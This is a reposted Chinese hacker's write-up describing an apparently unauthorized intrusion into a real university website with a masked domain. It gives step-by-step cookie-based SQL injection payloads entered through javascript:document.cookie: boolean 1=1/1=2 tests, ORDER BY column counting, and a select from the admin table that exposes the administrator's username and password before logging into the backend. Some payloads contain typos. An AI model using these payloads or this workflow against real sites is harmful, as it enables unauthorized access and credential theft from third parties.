转自:http://www.2cto.com/Article/200906/39180.html
暗组 zachary
大学快毕业了,想起高考时想填的一个学校,由于高考考的比较差,只超过二本十多分,只能往二本中靠低的学校填。首先踩点,打开google输入:site:XXXXXX inurl:asp?id= 搜出很多链接,随便打开了一个,在后面加上单引号,提示如图一所示
明显做了防注入过滤。按照我一般的思路是:首先是检查是否有注入点,不行就检查cookie注入,再不行就找别的突破点。清空地址栏,输入:javascript:alert(document.cookie=”id=”+escape(“1556 and 1=1”)),然后去掉?id=1556输入http://soft.XXXXX.edu.cn/list.asp,返回正常,得到页面如图二所示:
再清空地址栏,输入:javascript:alert(document.cookie=“id=”+escape(“1556 and 1=2”))回车,然后输入:http://soft.XXXXX.edu.cn/list.asp,得到页面如图三所示
页面二与页面三明显存在不同,是存在cookie注入的。现在来获取账号密码。首先利用order by进行字段数查询。输入:javascrip:alert(document.Cookie=“id=”+escape(“1556 order by 10”)),返回正常页面,这说明字段数大于10,经过几次猜解,确定字段数为30。开始猜表名:输入:javascript:alert(document.cookie=“id=”+escape(“1556 and 1=2 select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,,27,28,29,30 from admin”))回车,再次输入http://soft.XXXXX.edu.cn/list.asp得到页面,并把可显示的字段显示出来了,如图四所示:
开始猜字段名:清空地址栏输入:javascript:alert(document.cookie=“id=”+escape(“1556 and 1=2 select 1,2,3,4,5,6,7,8,9,10,11,12,username ,password,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin”)回车,清空地址栏输入:http://soft.XXXXX.edu.cn/list.asp,得到如图五所示的页面
这样就把管理员的账号密码爆出来了,登入后台,发现后台的功能太少了,可利用的地方几乎没有。最后没得拿到shell。后台页面如图